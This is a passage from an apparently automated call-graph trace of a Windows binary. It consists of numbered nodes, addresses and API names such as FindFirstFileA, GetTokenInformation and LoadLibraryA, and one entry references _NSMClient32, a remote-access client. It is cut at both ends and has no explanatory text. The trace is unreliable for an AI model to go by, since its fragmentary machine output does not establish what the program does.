1102d7d9 std::ios_base::_Ios_base_dtor 74326->74347 76417 1110fc70 278 API calls 2 library calls 74326->76417 74327 11146450 std::_Mutex::_Mutex 21 API calls 74329 1102d7ec 74327->74329 74328->74308 74331 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 74328->74331 74330 1102d809 CloseHandle 74329->74330 76418 1108a570 74329->76418 74335 1102d824 74330->74335 74336 1102d82a 74330->74336 74334 1102d953 74331->74334 74332 11146450 std::_Mutex::_Mutex 21 API calls 74349 1102d6ff std::ios_base::_Ios_base_dtor 74332->74349 74338 1102d96e _memset 74334->74338 76430 11029450 265 API calls 2 library calls 74334->76430 74339 11162be5 _free 66 API calls 74335->74339 74336->74357 76425 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 74336->76425 74337 1102d800 std::ios_base::_Ios_base_dtor 74337->74330 74342 1102d988 FindFirstFileA 74338->74342 74339->74336 74344 1102d9d4 74342->74344 74345 1102d9a8 FindNextFileA 74342->74345 76431 111266e0 291 API calls 5 library calls 74344->76431 74355 1102d9c8 FindClose 74345->74355 74346 1102d858 74346->74357 76427 1110fc70 278 API calls 2 library calls 74346->76427 74347->74327 74348 11162be5 _free 66 API calls 74351 1102d83c 74348->74351 74349->74313 74349->74332 76415 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 74349->76415 74351->74346 74351->74348 76426 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 74351->76426 74355->74344 76428 1100d4e0 FreeLibrary 74357->76428 74359->73164 74360->73168 74361->73186 74362->73189 74424 11142ad6 74423->74424 74425 11142b93 74424->74425 74430 11081a70 74424->74430 74425->73529 74427 11142afb 74428 11081a70 IsDBCSLeadByte 74427->74428 74429 11142b2b _memmove 74428->74429 74429->73529 74431 11081a7c 74430->74431 74433 11081a81 std::_Mutex::_Mutex __mbschr_l 74430->74433 74434 11081990 IsDBCSLeadByte 74431->74434 74433->74427 74434->74433 74435->73537 74437 11144bf2 74436->74437 74441 11144c09 std::_Mutex::_Mutex 74436->74441 74482 11029450 265 API calls 2 library calls 74437->74482 74440 11144d97 74442 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 74440->74442 74441->74440 74443 11144c3c GetModuleFileNameA 74441->74443 74444 11144db3 wsprintfA 74442->74444 74460 11081b40 74443->74460 74444->73541 74446 11144c51 74447 11144c61 SHGetFolderPathA 74446->74447 74459 11144d48 74446->74459 74449 11144c8e 74447->74449 74450 11144cad SHGetFolderPathA 74447->74450 74448 11142290 std::_Mutex::_Mutex 262 API calls 74448->74440 74449->74450 74453 11144c94 74449->74453 74452 11144ce2 std::_Mutex::_Mutex 74450->74452 74456 1102a620 std::_Mutex::_Mutex 145 API calls 74452->74456 74483 11029450 265 API calls 2 library calls 74453->74483 74457 11144cf3 74456->74457 74464 11144670 74457->74464 74459->74448 74459->74459 74461 11081b53 _strrchr 74460->74461 74463 11081b6a std::_Mutex::_Mutex 74461->74463 74484 11081990 IsDBCSLeadByte 74461->74484 74463->74446 74465 111446fa 74464->74465 74466 1114467b 74464->74466 74465->74459 74466->74465 74467 1114468b GetFileAttributesA 74466->74467 74468 111446a5 74467->74468 74469 11144697 74467->74469 74470 11163cf8 __strdup 66 API calls 74468->74470 74469->74459 74471 111446ac 74470->74471 74472 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 74471->74472 74473 111446b6 74472->74473 74474 111446d3 74473->74474 74475 11144670 std::_Mutex::_Mutex 67 API calls 74473->74475 74474->74459 74476 111446c6 74475->74476 74477 111446dc 74476->74477 74478 111446ce 74476->74478 74480 11162be5 _free 66 API calls 74477->74480 74479 11162be5 _free 66 API calls 74478->74479 74479->74474 74481 111446e1 CreateDirectoryA 74480->74481 74481->74474 74484->74463 74606 11144ea0 74485->74606 74487 11061d1c 74488 110d1550 268 API calls 74487->74488 74489 11061d30 74488->74489 74491 11061f17 74489->74491 74540 11061d44 std::ios_base::_Ios_base_dtor 74489->74540 74615 1116449d 74489->74615 74490 11062c88 74494 110d07c0 265 API calls 74490->74494 74493 1116449d _fgets 81 API calls 74491->74493 74492 11163db7 std::_Mutex::_Mutex 102 API calls 74492->74490 74497 11061f31 74493->74497 74532 11061e11 std::ios_base::_Ios_base_dtor 74494->74532 74496 11061dc7 74500 11061f38 74497->74500 74504 11061f97 _strpbrk 74497->74504 74501 11061f7d 74500->74501 74540->74490 74540->74492 74609 11144eb3 std::ios_base::_Ios_base_dtor 74606->74609 74607 11144dc0 267 API calls 74607->74609 74609->74607 74610 11144f1a std::ios_base::_Ios_base_dtor 74609->74610 74611 11144ed5 GetLastError 74609->74611 74707 11163fed 74609->74707 74610->74487 74611->74609 74612 11144ee0 Sleep 74611->74612 74613 11163fed std::_Mutex::_Mutex 143 API calls 74612->74613 74614 11144ef2 74613->74614 74614->74609 74614->74610 74616 111644a9 __alloc_osfhnd 74615->74616 74617 111644bc 74616->74617 74618 111644ed 74616->74618 75079 111692ef 66 API calls __getptd_noexit 74617->75079 74624 111644cc __alloc_osfhnd 74618->74624 75053 1116af99 74618->75053 74624->74496 74710 11163f31 74707->74710 74709 11163fff 74709->74609 74711 11163f3d __alloc_osfhnd 74710->74711 74712 11163f50 74711->74712 74715 11163f7d 74711->74715 74768 111692ef 66 API calls __getptd_noexit 74712->74768 74714 11163f55 74769 1116df04 11 API calls _memcpy_s 74714->74769 74729 111716f8 74715->74729 74725 11163f60 __alloc_osfhnd @_EH4_CallFilterFunc@8 74725->74709 74730 11171704 __alloc_osfhnd 74729->74730 74731 1117373c __lock 66 API calls 74730->74731 74732 11171712 74731->74732 74768->74714 74769->74725 75257 11060e40 75253->75257 75268 11060760 75257->75268 75269 1110f420 std::_Mutex::_Mutex 265 API calls 75268->75269 75270 1106077c 75269->75270 75271 110607c5 75270->75271 75272 11060783 75270->75272 75327 1116219a 66 API calls std::exception::_Copy_str 75271->75327 75320 1105e300 75272->75320 75275 110607bb 75279 110607f0 75275->75279 75276 110607d4 75328 111625f1 RaiseException 75276->75328 75278 110607e9 75321 1105e311 LeaveCriticalSection 75320->75321 75322 1105e31b 75320->75322 75321->75322 75323 11162be5 _free 66 API calls 75322->75323 75326 1105e32f 75322->75326 75323->75326 75324 1105e375 75324->75275 75325 1105e339 EnterCriticalSection 75325->75275 75326->75324 75326->75325 75327->75276 75328->75278 76376->74203 76377->74206 76378->74210 76379->74237 76433 110805f0 76380->76433 76385 1102d54a 76389 110eb080 76385->76389 76386 110affe7 76445 11029450 265 API calls 2 library calls 76386->76445 76390 110affa0 267 API calls 76389->76390 76391 110eb0ad 76390->76391 76461 110ea450 76391->76461 76395 1102d555 76403 110b0190 267 API calls std::_Mutex::_Mutex 76395->76403 76396->74233 76397->74227 76398->74228 76399->74234 76400->74239 76401->74242 76402->74259 76403->74272 76404->74357 76405->74260 76406->74260 76407->74271 76409->74278 76410->74285 76411->74268 76413->74316 76414->74349 76415->74349 76416->74326 76417->74347 76419 1108a617 76418->76419 76422 1108a5aa std::ios_base::_Ios_base_dtor 76418->76422 76420 1108a61e DeleteCriticalSection 76419->76420 76474 1106e1b0 76420->76474 76421 1108a5be CloseHandle 76421->76422 76422->76419 76422->76421 76424 1108a644 std::ios_base::_Ios_base_dtor 76424->74337 76425->74351 76426->74351 76427->74357 76428->74283 76429->74293 76431->74308 76432->74309 76434 11080614 76433->76434 76435 11080618 76434->76435 76436 1108062f 76434->76436 76446 11029450 265 API calls 2 library calls 76435->76446 76438 11080648 76436->76438 76439 1108062c 76436->76439 76442 110aff90 76438->76442 76439->76436 76447 11029450 265 API calls 2 library calls 76439->76447 76448 110812d0 76442->76448 76449 110812f1 76448->76449 76451 1108131d 76448->76451 76450 1108130b 76449->76450 76449->76451 76452 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76450->76452 76453 1108136a wsprintfA 76451->76453 76454 11081345 wsprintfA 76451->76454 76455 11081319 76452->76455 76460 11029450 265 API calls 2 library calls 76453->76460 76454->76451 76455->76385 76455->76386 76463 110ea45b 76461->76463 76462 110ea4f5 76471 110b0190 267 API calls std::_Mutex::_Mutex 76462->76471 76463->76462 76464 110ea47e 76463->76464 76465 110ea495 76463->76465 76472 11029450 265 API calls 2 library calls 76464->76472 76467 110ea492 76465->76467 76468 110ea4c2 SendMessageTimeoutA 76465->76468 76467->76465 76473 11029450 265 API calls 2 library calls 76467->76473 76468->76462 76471->76395 76477 1106e1c4 76474->76477 76475 1106e1c8 76475->76424 76477->76475 76478 1106d9a0 67 API calls 2 library calls 76477->76478 76478->76477 76493 11134d10 76494 11134d19 76493->76494 76500 11134d48 76493->76500 76495 11145320 std::_Mutex::_Mutex 90 API calls 76494->76495 76496 11134d1e 76495->76496 76497 11132bf0 274 API calls 76496->76497 76496->76500 76498 11134d27 76497->76498 76499 1105dd10 79 API calls 76498->76499 76498->76500 76499->76500 76501 110310c0 76502 110310ce 76501->76502 76503 11145e80 268 API calls 76502->76503 76504 110310df SetUnhandledExceptionFilter 76503->76504 76505 110310ef std::_Mutex::_Mutex 76504->76505 76506 11040860 76507 11040892 76506->76507 76508 11040898 76507->76508 76513 110408b4 76507->76513 76509 110facc0 15 API calls 76508->76509 76511 110408aa CloseHandle 76509->76511 76510 110409c8 76512 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76510->76512 76511->76513 76515 110409d5 76512->76515 76513->76510 76517 110408ed 76513->76517 76538 11087ee0 297 API calls 5 library calls 76513->76538 76514 11040948 76528 110facc0 GetTokenInformation 76514->76528 76517->76510 76517->76514 76519 1104095a 76520 11040962 CloseHandle 76519->76520 76523 11040969 76519->76523 76520->76523 76521 110409ab 76524 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76521->76524 76522 11040991 76525 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76522->76525 76523->76521 76523->76522 76526 110409c4 76524->76526 76527 110409a7 76525->76527 76529 110fad08 76528->76529 76530 110facf7 76528->76530 76539 110f1f50 9 API calls 76529->76539 76531 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76530->76531 76533 110fad04 76531->76533 76533->76519 76534 110fad2c 76534->76530 76535 110fad34 76534->76535 76535->76535 76536 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76535->76536 76537 110fad5a 76536->76537 76537->76519 76538->76517 76539->76534 76540 261020 GetCommandLineA 76542 261035 GetStartupInfoA 76540->76542 76543 261090 GetModuleHandleA 76542->76543 76544 26108b 76542->76544 76547 261000 _NSMClient32 76543->76547 76544->76543 76546 2610a2 ExitProcess 76547->76546 76548 11089a40 76549 1110f6c0 ___DllMainCRTStartup 4 API calls 76548->76549 76550 11089a53 76549->76550 76551 11089a5d 76550->76551 76560 11089150 268 API calls std::_Mutex::_Mutex 76550->76560 76554 11089a84 76551->76554 76561 11089150 268 API calls std::_Mutex::_Mutex 76551->76561 76556 11089a93 76554->76556 76557 11089a10 76554->76557 76562 110896a0 76557->76562 76560->76551 76561->76554 76603 11088970 6 API calls ___DllMainCRTStartup 76562->76603 76564 110896d9 GetParent 76565 110896ec 76564->76565 76566 110896fd 76564->76566 76567 110896f0 GetParent 76565->76567 76568 11144dc0 267 API calls 76566->76568 76567->76566 76567->76567 76569 11089709 76568->76569 76570 11163fed std::_Mutex::_Mutex 143 API calls 76569->76570 76571 11089716 std::ios_base::_Ios_base_dtor 76570->76571 76572 11144dc0 267 API calls 76571->76572 76573 1108972f 76572->76573 76604 11013830 22 API calls 2 library calls 76573->76604 76575 1108974a 76575->76575 76576 11143230 std::_Mutex::_Mutex 8 API calls 76575->76576 76578 1108978a std::ios_base::_Ios_base_dtor 76576->76578 76577 110897a5 76579 11163db7 std::_Mutex::_Mutex 102 API calls 76577->76579 76580 110897c3 std::_Mutex::_Mutex 76577->76580 76578->76577 76581 11142290 std::_Mutex::_Mutex 265 API calls 76578->76581 76579->76580 76582 1102a620 std::_Mutex::_Mutex 145 API calls 76580->76582 76594 11089874 std::ios_base::_Ios_base_dtor 76580->76594 76581->76577 76584 11089813 76582->76584 76583 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76585 11089962 76583->76585 76586 11142290 std::_Mutex::_Mutex 265 API calls 76584->76586 76585->76556 76587 1108981b 76586->76587 76588 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 76587->76588 76589 11089832 76588->76589 76590 11081bb0 86 API calls 76589->76590 76589->76594 76591 1108984a 76590->76591 76592 1108988e 76591->76592 76593 11089851 76591->76593 76595 11081bb0 86 API calls 76592->76595 76605 110b75d0 76593->76605 76594->76583 76597 11089899 76595->76597 76597->76594 76599 110b75d0 68 API calls 76597->76599 76601 110898a6 76599->76601 76600 110b75d0 68 API calls 76600->76594 76601->76594 76602 110b75d0 68 API calls 76601->76602 76602->76594 76603->76564 76604->76575 76608 110b75b0 76605->76608 76611 111672e3 76608->76611 76614 11167264 76611->76614 76615 11167271 76614->76615 76616 1116728b 76614->76616 76632 11169302 66 API calls __getptd_noexit 76615->76632 76616->76615 76617 11167294 GetFileAttributesA 76616->76617 76619 111672a2 GetLastError 76617->76619 76624 111672b8 76617->76624 76635 11169315 66 API calls __dosmaperr 76619->76635 76620 11167276 76633 111692ef 66 API calls __getptd_noexit 76620->76633 76623 1116727d 76634 1116df04 11 API calls _memcpy_s 76623->76634 76628 11089857 76624->76628 76637 11169302 66 API calls __getptd_noexit 76624->76637 76628->76594 76628->76600 76629 111672cb 76638 111692ef 66 API calls __getptd_noexit 76629->76638 76631 111672ae 76636 111692ef 66 API calls __getptd_noexit 76631->76636 76632->76620 76633->76623 76634->76628 76635->76631 76636->76628 76637->76629 76638->76631 76639 11106100 GetTickCount EnterCriticalSection GetTickCount 76640 11106153 76639->76640 76641 11106148 76639->76641 76643 11106172 76640->76643 76644 111061ca GetTickCount LeaveCriticalSection 76640->76644 76642 11146450 std::_Mutex::_Mutex 21 API calls 76641->76642 76642->76640 76645 11106190 GetTickCount LeaveCriticalSection 76643->76645 76676 11029450 265 API calls 2 library calls 76643->76676 76646 111061f0 EnterCriticalSection 76644->76646 76647 111061e2 76644->76647 76649 111061b3 76645->76649 76650 111061a8 76645->76650 76652 11106219 76646->76652 76651 11146450 std::_Mutex::_Mutex 21 API calls 76647->76651 76654 11146450 std::_Mutex::_Mutex 21 API calls 76650->76654 76655 111061ed 76651->76655 76656 11106223 76652->76656 76657 11106244 76652->76657 76654->76649 76655->76646 76658 111062be LeaveCriticalSection 76656->76658 76659 1110622e 76656->76659 76660 1110f420 std::_Mutex::_Mutex 265 API calls 76657->76660 76677 11029450 265 API calls 2 library calls 76659->76677 76662 1110624e 76660->76662 76664 11106267 76662->76664 76678 110f0cf0 InitializeCriticalSection InterlockedIncrement InterlockedIncrement CreateEventA 76662->76678 76667 11106274 76664->76667 76668 1110628b 76664->76668 76665 111062bb 76665->76658 76679 11029450 265 API calls 2 library calls 76667->76679 76680 110ebfb0 268 API calls 4 library calls 76668->76680 76671 111062a0 76681 11148f50 67 API calls std::ios_base::_Ios_base_dtor 76671->76681 76674 111062af 76675 11146450 std::_Mutex::_Mutex 21 API calls 76674->76675 76675->76665 76678->76664 76680->76671 76681->76674 76682 110173f0 GetTickCount 76689 11017300 76682->76689 76687 11146450 std::_Mutex::_Mutex 21 API calls 76688 11017437 76687->76688 76690 11017320 76689->76690 76696 110173d6 76689->76696 76692 11017342 CoInitialize _GetRawWMIStringW 76690->76692 76694 11017339 WaitForSingleObject 76690->76694 76691 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76693 110173e5 76691->76693 76697 110173c2 76692->76697 76699 11017375 76692->76699 76702 11017220 76693->76702 76694->76692 76695 110173d0 CoUninitialize 76695->76696 76696->76691 76697->76695 76697->76696 76698 110173bc 76715 11163837 67 API calls __fassign 76698->76715 76699->76697 76699->76698 76701 11163a2d std::_Mutex::_Mutex 79 API calls 76699->76701 76701->76699 76703 11017240 76702->76703 76704 110172e6 76702->76704 76705 11017258 CoInitialize _GetRawWMIStringW 76703->76705 76708 1101724f WaitForSingleObject 76703->76708 76706 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76704->76706 76709 1101728b 76705->76709 76714 110172d2 76705->76714 76707 110172f5 SetEvent GetTickCount 76706->76707 76707->76687 76708->76705 76711 110172cc 76709->76711 76713 11163a2d std::_Mutex::_Mutex 79 API calls 76709->76713 76709->76714 76710 110172e0 CoUninitialize 76710->76704 76716 11163837 67 API calls __fassign 76711->76716 76713->76709 76714->76704 76714->76710 76715->76697 76716->76714 76717 11025cd0 LoadLibraryA 76718 1113cd60 76719 1113cd69 76718->76719 76720 1113cd6e 76718->76720 76722 11139090 76719->76722 76723 111390d2 76722->76723 76724 111390c7 GetCurrentThreadId 76722->76724 76725 111390e0 76723->76725 76856 11029330 76723->76856 76724->76723 76863 11133920 76725->76863 76731 111391d1 76735 11139202 FindWindowA 76731->76735 76742 1113929a 76731->76742 76732 1113975a 76733 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76732->76733 76736 11139772 76733->76736 76739 11139217 IsWindowVisible 76735->76739 76735->76742 76736->76720 76737 1113911c IsWindow IsWindowVisible 76738 11146450 std::_Mutex::_Mutex 21 API calls 76737->76738 76740 11139147 76738->76740 76741 1113921e 76739->76741 76739->76742 76743 1105dd10 79 API calls 76740->76743 76741->76742 76748 11138c30 392 API calls 76741->76748 76744 1105dd10 79 API calls 76742->76744 76755 111392bf 76742->76755 76746 11139163 IsWindowVisible 76743->76746 76768 111392e7 76744->76768 76745 11139470 76747 1113948a 76745->76747 76752 11138c30 392 API calls 76745->76752 76746->76731 76751 11139171 76746->76751 76754 111394a7 76747->76754 77099 1106b860 298 API calls 76747->77099 76753 1113923f IsWindowVisible 76748->76753 76749 1105dd10 79 API calls 76750 1113945f 76749->76750 76750->76745 76756 11139464 76750->76756 76751->76731 76757 11139179 76751->76757 76752->76747 76753->76742 76758 1113924e IsIconic 76753->76758 77100 1112ce90 12 API calls 2 library calls 76754->77100 76755->76745 76755->76749 77098 1102cff0 294 API calls std::_Mutex::_Mutex 76756->77098 76762 11146450 std::_Mutex::_Mutex 21 API calls 76757->76762 76758->76742 76763 1113925f GetForegroundWindow 76758->76763 76766 11139183 GetForegroundWindow 76762->76766 77096 11131210 147 API calls 76763->77096 76764 111394ac 76770 111394b4 76764->76770 76771 111394bd 76764->76771 76765 1113946b 76765->76745 76776 11139192 EnableWindow 76766->76776 76777 111391be 76766->76777 76768->76755 76769 11139334 76768->76769 76779 11081a70 IsDBCSLeadByte 76768->76779 76773 11143230 std::_Mutex::_Mutex 8 API calls 76769->76773 77101 11131b00 89 API calls 2 library calls 76770->77101 76774 111394d4 76771->76774 76775 111394c8 76771->76775 76781 11139346 76773->76781 77103 111317a0 299 API calls std::_Mutex::_Mutex 76774->77103 76782 111394d9 76775->76782 77102 11131870 299 API calls std::_Mutex::_Mutex 76775->77102 77094 11131210 147 API calls 76776->77094 76777->76731 76791 111391ca SetForegroundWindow 76777->76791 76778 1113926e 77097 11131210 147 API calls 76778->77097 76779->76769 76780 111394ba 76780->76771 76786 11139353 GetLastError 76781->76786 76795 11139361 76781->76795 76788 111394d2 76782->76788 76789 111395e9 76782->76789 76794 11146450 std::_Mutex::_Mutex 21 API calls 76786->76794 76788->76782 76796 111394f1 76788->76796 76797 1113959b 76788->76797 76799 111386b0 295 API calls 76789->76799 76790 111391a9 77095 11131210 147 API calls 76790->77095 76791->76731 76792 11139275 76793 1113928b EnableWindow 76792->76793 76800 11139284 SetForegroundWindow 76792->76800 76793->76742 76794->76795 76795->76755 76805 111393b2 76795->76805 76809 11081a70 IsDBCSLeadByte 76795->76809 76796->76789 76806 1110f420 std::_Mutex::_Mutex 265 API calls 76796->76806 76797->76789 77111 1103f000 68 API calls 76797->77111 76813 111395ee 76799->76813 76800->76793 76801 111391b0 EnableWindow 76801->76777 76802 11139615 76815 1105dd10 79 API calls 76802->76815 76855 1113973a std::ios_base::_Ios_base_dtor 76802->76855 76804 111395aa 77112 1103f040 68 API calls 76804->77112 76807 11143230 std::_Mutex::_Mutex 8 API calls 76805->76807 76810 11139512 76806->76810 76812 111393c4 76807->76812 76809->76805 76811 11139533 76810->76811 77104 110573b0 308 API calls std::_Mutex::_Mutex 76810->77104 77105 1110f260 InterlockedIncrement 76811->77105 76812->76755 76817 111393cb GetLastError 76812->76817 76813->76802 77010 11142210 76813->77010 76814 111395b5 77113 1103f060 68 API calls 76814->77113 76829 11139645 76815->76829 76820 11146450 std::_Mutex::_Mutex 21 API calls 76817->76820 76820->76755 76822 111395c0 77114 1103f020 68 API calls 76822->77114 76823 11139558 77106 1104ce00 448 API calls 76823->77106 76826 111395cb 77115 1110f270 InterlockedDecrement 76826->77115 76827 11139563 77107 1104e340 448 API calls 76827->77107 76830 1113968d 76829->76830 76831 11139699 GetTickCount 76829->76831 76834 1113966a 76829->76834 76829->76855 76830->76831 76830->76855 76836 111396ab 76831->76836 76831->76855 76833 11139599 76833->76789 76835 11146450 std::_Mutex::_Mutex 21 API calls 76834->76835 76838 11139675 GetTickCount 76835->76838 76839 11142e80 145 API calls 76836->76839 76837 1113956e 77108 1104e3b0 448 API calls 76837->77108 76838->76855 76841 111396b7 76839->76841 76843 11146ee0 269 API calls 76841->76843 76842 11139579 77109 1104ce40 448 API calls 76842->77109 76845 111396c2 76843->76845 76847 11142e80 145 API calls 76845->76847 76846 11139584 76846->76789 77110 110ebf30 285 API calls 76846->77110 76849 111396d5 76847->76849 77116 11025bb0 LoadLibraryA 76849->77116 76851 111396e2 76851->76851 77117 1112c7a0 GetProcAddress SetLastError 76851->77117 76853 11139729 76854 11139733 FreeLibrary 76853->76854 76853->76855 76854->76855 76855->76732 77118 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 76856->77118 76858 11029353 77120 11089cc0 269 API calls 2 library calls 76858->77120 76861 1102933e 76861->76858 77119 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 76861->77119 76862 1102935e 76862->76725 76864 11133962 76863->76864 76865 11133c84 76863->76865 76866 1105dd10 79 API calls 76864->76866 76867 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 76865->76867 76868 11133982 76866->76868 76869 11133c9c 76867->76869 76868->76865 76870 1113398a GetLocalTime 76868->76870 76911 11133400 76869->76911 76871 111339c1 LoadLibraryA 76870->76871 76872 111339a0 76870->76872 77121 110098c0 LoadLibraryA 76871->77121 76873 11146450 std::_Mutex::_Mutex 21 API calls 76872->76873 76875 111339b5 76873->76875 76875->76871 76876 11133a15 77122 11015c30 LoadLibraryA 76876->77122 76878 11133a20 GetCurrentProcess 76879 11133a45 GetProcAddress 76878->76879 76880 11133a5d GetProcessHandleCount 76878->76880 76879->76880 76881 11133a66 SetLastError 76879->76881 76882 11133a6e 76880->76882 76881->76882 76883 11133a92 76882->76883 76884 11133a78 GetProcAddress 76882->76884 76886 11133aa0 GetProcAddress 76883->76886 76887 11133aba 76883->76887 76884->76883 76885 11133ac7 SetLastError 76884->76885 76885->76886 76886->76887 76888 11133ad4 SetLastError 76886->76888 76889 11133adf GetProcAddress 76887->76889 76888->76889 76890 11133af1 K32GetProcessMemoryInfo 76889->76890 76891 11133aff SetLastError 76889->76891 76892 11133b07 76890->76892 76891->76892 76893 11146450 std::_Mutex::_Mutex 21 API calls 76892->76893 76897 11133b7d 76892->76897 76893->76897 76894 11133c5a 76895 11133c6a FreeLibrary 76894->76895 76896 11133c6d 76894->76896 76895->76896 76898 11133c77 FreeLibrary 76896->76898 76899 11133c7a 76896->76899 76897->76894 76901 1105dd10 79 API calls 76897->76901 76898->76899 76899->76865 76900 11133c81 FreeLibrary 76899->76900 76900->76865 76902 11133bce 76901->76902 76903 1105dd10 79 API calls 76902->76903 76904 11133bf6 76903->76904 76905 1105dd10 79 API calls 76904->76905 76907 11133c1d 76905->76907 76906 1105dd10 79 API calls 76908 11133c44 76906->76908 76907->76906 76908->76894 76909 11133c55 76908->76909 77123 11027780 265 API calls 2 library calls 76909->77123 76913 1113342d 76911->76913 76912 111338e9 76912->76731 76912->76732 77014 11138c30 76912->77014 76913->76912 76914 110d1550 268 API calls 76913->76914 76915 1113348e 76914->76915 76916 110d1550 268 API calls 76915->76916 76917 11133499 76916->76917 76918 111334c7 76917->76918 76919 111334de 76917->76919 77124 11029450 265 API calls 2 library calls 76918->77124 76921 11146450 std::_Mutex::_Mutex 21 API calls 76919->76921 76923 111334ec 76921->76923 77125 110d12e0 265 API calls 76923->77125 77011 1114222f 77010->77011 77012 1114221a 77010->77012 77011->76802 77126 11141890 77012->77126 77015 1113906f 77014->77015 77018 11138c4d 77014->77018 77016 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77015->77016 77017 1113907e 77016->77017 77017->76737 77018->77015 77019 111450a0 std::_Mutex::_Mutex 90 API calls 77018->77019 77020 11138c8c 77019->77020 77020->77015 77021 1105dd10 79 API calls 77020->77021 77022 11138cbb 77021->77022 77262 1112c920 77022->77262 77024 11138e00 PostMessageA 77025 11138e15 77024->77025 77027 11138e25 77025->77027 77271 1110f270 InterlockedDecrement 77025->77271 77026 1105dd10 79 API calls 77028 11138dfc 77026->77028 77030 11138e2b 77027->77030 77031 11138e4d 77027->77031 77028->77024 77028->77025 77033 11138e83 std::ios_base::_Ios_base_dtor 77030->77033 77034 11138e9e 77030->77034 77272 11130410 315 API calls std::_Mutex::_Mutex 77031->77272 77041 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77033->77041 77036 11142e80 145 API calls 77034->77036 77035 11138e55 77273 11146ec0 267 API calls 77035->77273 77039 11138ea3 77036->77039 77042 11146ee0 269 API calls 77039->77042 77040 11138e5f 77274 1112cb20 SetDlgItemTextA 77040->77274 77044 11138e9a 77041->77044 77045 11138eaa SetWindowTextA 77042->77045 77044->76737 77048 11138ec6 77045->77048 77051 11138ecd std::ios_base::_Ios_base_dtor 77045->77051 77046 11138e70 std::ios_base::_Ios_base_dtor 77046->77030 77047 11145b40 271 API calls 77049 11138dab 77047->77049 77275 111352b0 299 API calls 5 library calls 77048->77275 77049->77024 77049->77026 77052 11138f24 77051->77052 77053 11138ef7 77051->77053 77276 111352b0 299 API calls 5 library calls 77051->77276 77054 11138f38 77052->77054 77055 11138ffc 77052->77055 77053->77052 77059 11138f0c 77053->77059 77056 11138f5c 77054->77056 77278 111352b0 299 API calls 5 library calls 77054->77278 77058 1113901d 77055->77058 77063 1113900b 77055->77063 77064 11139004 77055->77064 77280 110f8640 86 API calls 77056->77280 77284 110f8640 86 API calls 77058->77284 77277 11131210 147 API calls 77059->77277 77283 11131210 147 API calls 77063->77283 77282 111352b0 299 API calls 5 library calls 77064->77282 77066 11139028 77066->77015 77072 1113902c IsWindowVisible 77066->77072 77067 11138f67 77067->77015 77073 11138f6f IsWindowVisible 77067->77073 77069 11138f1c 77069->77052 77071 11138f46 77071->77056 77075 11138f52 77071->77075 77072->77015 77076 1113903e IsWindowVisible 77072->77076 77073->77015 77077 11138f86 77073->77077 77074 1113901a 77074->77058 77279 11131210 147 API calls 77075->77279 77076->77015 77079 1113904b EnableWindow 77076->77079 77080 111450a0 std::_Mutex::_Mutex 90 API calls 77077->77080 77285 11131210 147 API calls 77079->77285 77083 11138f91 77080->77083 77081 11138f59 77081->77056 77083->77015 77085 11138f9c GetForegroundWindow IsWindowVisible 77083->77085 77084 11139062 EnableWindow 77084->77015 77086 11138fc1 77085->77086 77087 11138fb6 EnableWindow 77085->77087 77281 11131210 147 API calls 77086->77281 77087->77086 77089 11138fc8 77090 11138fde EnableWindow 77089->77090 77091 11138fd7 SetForegroundWindow 77089->77091 77092 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77090->77092 77091->77090 77093 11138ff8 77092->77093 77093->76737 77094->76790 77095->76801 77096->76778 77097->76792 77098->76765 77099->76754 77100->76764 77101->76780 77102->76788 77103->76782 77104->76811 77105->76823 77106->76827 77107->76837 77108->76842 77109->76846 77110->76833 77111->76804 77112->76814 77113->76822 77114->76826 77115->76833 77116->76851 77117->76853 77118->76861 77119->76861 77120->76862 77121->76876 77122->76878 77123->76894 77127 111418cf 77126->77127 77176 111418c8 std::ios_base::_Ios_base_dtor 77126->77176 77128 1110f420 std::_Mutex::_Mutex 265 API calls 77127->77128 77130 111418d6 77128->77130 77129 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 77131 1114220a 77129->77131 77132 11141906 77130->77132 77253 11060f70 301 API calls std::_Mutex::_Mutex 77130->77253 77131->77011 77134 11061700 275 API calls 77132->77134 77135 11141942 77134->77135 77136 11141949 RegCloseKey 77135->77136 77137 11141950 std::_Mutex::_Mutex 77135->77137 77136->77137 77138 11144dc0 267 API calls 77137->77138 77139 1114196c 77138->77139 77140 11143230 std::_Mutex::_Mutex 8 API calls 77139->77140 77141 11141980 77140->77141 77142 11141997 77141->77142 77143 11062d60 330 API calls 77141->77143 77144 1110f420 std::_Mutex::_Mutex 265 API calls 77142->77144 77143->77142 77145 1114199e 77144->77145 77146 111419ba 77145->77146 77254 11060be0 293 API calls std::_Mutex::_Mutex 77145->77254 77148 1110f420 std::_Mutex::_Mutex 265 API calls 